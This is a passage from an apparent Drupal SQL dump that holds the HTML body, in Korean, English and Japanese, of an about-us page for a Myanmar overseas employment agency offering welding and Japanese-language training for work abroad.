style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">있도록</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">필요한</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">교육을</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">제공하고 돕고 있습니다</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">.</span><o:p></o:p></p><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">일본으로 취업비자</span><span style=\"mso-fareast-language:KO;\">,&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">연수비자로 가기</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">위해</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">필요한</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">자격시험</span><span style=\"mso-fareast-language:KO;\">(JLPT, JFT, NAT-TEST, TOP-J)</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">에</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">합격할</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">수</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">있도록</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">어학당도</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">개설</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">및 교육을</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">지원하고</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">있습니다</span><span style=\"mso-fareast-language:KO;\">.</span><o:p></o:p></p><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">저희는</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">”</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\"><strong>뉴코멧</strong></span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\"><strong>해외직업소개회사</strong></span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\"><strong>”&nbsp;</strong></span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-bidi-font-weight:bold;mso-fareast-language:KO;\" lang=\"KO\">는</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">미얀마에서</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">우수한</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">기능인력을</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">배출하여</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">해외로</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">파견하는</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">서비스를</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">제공하기</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">위해</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">끊임없이</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">노력하고</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">있습니다</span><span style=\"mso-fareast-language:KO;\">.</span><o:p></o:p><o:p></o:p></p>', '', 'full_html'),
('page', 0, 23, 189, 'en', 0, '<p>&nbsp;<span style=\"font-size:14.0pt;line-height:107%;\">We, ``NEW COMET TRADING\'\' company, was established in 2004 and started operating with company registration number (295/2004-2005).</span><o:p></o:p></p><p><span style=\"font-size:14.0pt;line-height:107%;\">NEW COMET TRADING AGENCY Co.,Ltd (New Comet Overseas Employment Agency) licence was obtained in 2023 and since then, the company has started to carry out service activities.</span><o:p></o:p></p><p><span style=\"font-size:14.0pt;line-height:107%;\">&nbsp;We, ``NEW COMET TRADING AGENCY\'\' company, which is a brother company, such as, ZEYA NEW COMET Auto Sale &amp; Services Co.,Ltd, NEW COMET Co.,Ltd, have applied for vehicle import permits from the Ministry of Economy and Commerce, and have been working for more than 25 years in the business of buying, importing and selling various types of business trucks, tourism and transportation buses and machinery directly from Japan, and have paid the taxes set for the state. More than 100 employees were given employment opportunities.</span><o:p></o:p></p><p><span style=\"font-size:14.0pt;line-height:107%;\">In addition, brother companies such as NEW COMET Construction Co.,Ltd, NEW ZAYYA SHWE PYI Construction Co.,Ltd, AUNG NAY WUN Construction Co.,Ltd and other companies have also successfully won tenders from government ministries and have provided employment opportunities to more than 200 employees.</span></p><p><span style=\"font-size:14.0pt;line-height:107%;\">Our company \"NEW COMET TRADING AGENCY “company is currently providing welding training courses to become qualified skilled workers at the Sinmalike Shipyard for ethnic brothers from all over Myanmar who want to work in Korea\'s shipyards and connect them with job opportunities.&nbsp;</span></p><p><o:p></o:p><span style=\"font-size:14.0pt;line-height:107%;\">In addition, we are connecting job opportunities for young people who want to work in countries such as Dubai, Malaysia, Singapore, Thailand, and Japan.</span><o:p></o:p></p><p><span style=\"font-size:14.0pt;line-height:107%;\">We at NEW COMET TRADING AGENCY Co.Ltd, are assisting on responsible for learning about Japan\'s developed advanced technologies, cultures and expressing their personal abilities and goals for the young generation in Myanmar.&nbsp;</span></p><p><o:p></o:p><span style=\"font-size:14.0pt;line-height:107%;\">In order to successfully pass the qualification tests (JLPT, JFT, NAT-TEST, TOP-J) required to go to Japan with a Work Visa and Training Visa, we are opening language training schools and providing teaching support.</span><o:p></o:p></p><p><span style=\"font-size:14.0pt;line-height:107%;\">We, \"NEW COMET TRADING AGENCY\" company, is constantly striving to provide services that produce talented skilled workers from Myanmar and send them to foreign countries.</span></p><img src=\"/sites/default/files/inline-images/page01.jpg\" data-align=\"center\" data-entity-uuid=\"bb0a6309-0480-4e15-977d-7779b6ab5882\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page02.jpg\" data-entity-uuid=\"3d648acd-e4d6-422e-96ec-0f4ef8a0ddaa\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page03.jpg\" data-entity-uuid=\"b4e48cbd-91b4-4348-a15c-c383659f5dff\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page04.jpg\" data-entity-uuid=\"f62451bb-2aa5-4267-9cf7-76b35949208e\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page05.jpg\" data-entity-uuid=\"f7fdcca7-3b28-4e95-9a70-f8ca466d9476\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page06.jpg\" data-entity-uuid=\"565a7606-51ac-43fc-9c7a-1f2fe7c3935d\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page07.jpg\" data-entity-uuid=\"241602f2-5bf8-4040-8551-8abbc9990697\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page08.jpg\" data-entity-uuid=\"4ee88431-32e2-499a-873a-72b73c80dd87\" data-entity-type=\"file\"><p>&nbsp;</p><p>&nbsp;</p><p>&nbsp;</p><p>&nbsp;</p><p>&nbsp;</p><p>&nbsp;</p><p>&nbsp;</p>', '', 'full_html'),
('page', 0, 23, 189, 'ja', 0, '<p class=\"MsoNormal\"><span style=\"mso-bidi-font-size:10.5pt;\" lang=\"JA\">当社は</span><span style=\"mso-bidi-font-size:10.5pt;\">2004</span><span style=\"mso-bidi-font-size:10.5pt;\" lang=\"JA\">年に設立し、登録</span><span style=\"mso-bidi-font-size:10.5pt;\">ID(295/2004</span><span style=\"mso-bidi-font-size:10.5pt;\" lang=\"JA\">ー</span><span style=\"mso-bidi-font-size:10.5pt;\">2005)</span><span style=\"mso-bidi-font-size:10.5pt;\" lang=\"JA\">を持ち、サービスの提供を行ってきました。ニューコメットトレンディーグ海外エイジェンシー登録を</span><span style=\"mso-bidi-font-size:10.5pt;\">2023</span><span style=\"mso-bidi-font-size:10.5pt;\" lang=\"JA\">年にできまして、運営を始めました。</span><o:p></o:p></p><p class=\"MsoNormal\"><span style=\"mso-bidi-font-size:10.5pt;\" lang=\"JA\">ニューコメットトレーディング会社のグループ会社である</span><span style=\"mso-bidi-font-size:10.5pt;\">.</span><span style=\"mso-bidi-font-size:10.5pt;\" lang=\"JA\">ゼィーヤーニューコメットとしては自動車輸入許可をもらって現場用トラックや、旅行用と交通機関などに使用されるバスや色々な機械を日本から直接輸入をし、販売する事業を</span><span style=\"mso-bidi-font-size:10.5pt;\">25</span><span style=\"mso-bidi-font-size:10.5pt;\" lang=\"JA\">年間やり続けてきました。税金の納税もしっかり行なった上、</span><span style=\"mso-bidi-font-size:10.5pt;\">100</span><span style=\"mso-bidi-font-size:10.5pt;\" lang=\"JA\">人の従業員を持つ事ができました。</span><o:p></o:p></p><p class=\"MsoNormal\"><span style=\"mso-bidi-font-size:10.5pt;\" lang=\"JA\">それに、グループ会社であるニューコメットト建築会社、ゼィーヤシュェピーティー建築会社、アウンネーウィン建築会社でも政府からきょかおたくさん頂き、</span><span style=\"mso-bidi-font-size:10.5pt;\">200</span><span style=\"mso-bidi-font-size:10.5pt;\" lang=\"JA\">人程の従業員を持った会社として動いております。</span><o:p></o:p></p><p class=\"MsoNormal\"><span style=\"mso-bidi-font-size:10.5pt;\" lang=\"JA\">現在、ニューコメットトレンディグエイジェンシーでは韓国の造船所で働きたいミャンマー全国から民族問わず、商務部の下でシンマライ湾岸で経験豊富な先生達の元で練習を重ねた研修をしていただき、仕事紹介をしております。</span><o:p></o:p></p><p class=\"MsoNormal\"><span style=\"mso-bidi-font-size:10.5pt;\" lang=\"JA\">そして、ドバイ、マレーシア、シンガポール、タイ、日本にもお仕事紹介できる様に力を注いでおります。</span><o:p></o:p></p><p class=\"MsoNormal\"><span lang=\"JA\">ミャンマーの若者達には自分に合ったお仕事や自分らしさをたもちながら、日本の技術を勉強できるようにサポートをし続けたいと努力をしております。</span><o:p></o:p></p><p class=\"MsoNormal\"><span lang=\"JA\">日本語能力試験</span>(JLPT,<span style=\"mso-spacerun:yes;\">&nbsp; </span>JFT, NAT-TEST, TOP-J)<span lang=\"JA\">を合格した生徒はワークビザ、研修ビザなどて、いけるように提案をしております。</span><o:p></o:p></p><p class=\"MsoNormal\"><span lang=\"JA\">我々ニューコメットトレーディング会社からは経験豊富で、能力の高い研修生達を生み出し、海外の仕事チャンスを与えることに重ねて努力をしてまいります。</span><o:p></o:p></p>', '', 'full_html');
INSERT INTO `node_revision__body` (`bundle`, `deleted`, `entity_id`, `revision_id`, `langcode`, `delta`, `body_value`, `body_summary`, `body_format`) VALUES
('page', 0, 23, 189, 'ko', 0, '<p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">저희</span><span style=\"mso-fareast-language:KO;\"> ``New Comet Trading\'\'&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">회사는</span><span style=\"mso-fareast-language:KO;\"> 2004</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">년에</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">설립되어</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">사업자등록번호</span><span style=\"mso-fareast-language:KO;\">(295/2004-2005)</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">로</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">영업을</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">시작하였습니다</span><span style=\"mso-fareast-language:KO;\">.</span><o:p></o:p></p><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">뉴코멧무역대행</span><span style=\"mso-fareast-language:KO;\"> 2023</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">년</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">뉴코멧</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">외국인고용업</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">면허를</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">취득하여</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">서비스</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">활동을</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">시작하였습니다</span><span style=\"mso-fareast-language:KO;\">.</span><o:p></o:p></p><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">저희 <strong>뉴코멧</strong></span><span style=\"mso-fareast-language:KO;\" lang=\"KO\"><strong>&nbsp;</strong></span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\"><strong>해외직업소개회사</strong>&nbsp;</span><span style=\"mso-fareast-language:KO;\">\"New Comet Overseas Employment Agency\"</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">는자매</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">회사인&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-spacerun:yes;\" lang=\"KO\"> </span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\"><strong>제야뉴코멧 자동차 판매 및 서비스 회사</strong></span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">, </span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\"><strong>뉴코멧회사</strong>등</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">기업들과</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">협력하여</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">경제통상자원부에서&nbsp;</span><span style=\"mso-fareast-language:KO;mso-spacerun:yes;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">차량</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">수입허가를</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">신청했고</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">각종</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">상용트럭</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">, </span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">관광</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">산업 및</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">운송에</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">사용되는</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">다양한</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">유형의</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">버스</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">및</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">기계를</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">일본에서</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">직접</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">구매 판매하는</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">사업을</span><span style=\"mso-fareast-language:KO;\"> 25</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">년</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">이상&nbsp;</span><span style=\"mso-fareast-language:KO;mso-spacerun:yes;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">종사해</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">왔고 나라를 위한 정한 세금들을 냈습니다</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">. </span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">게다가</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">100 </span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">명 이상의</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">직원에게</span><span 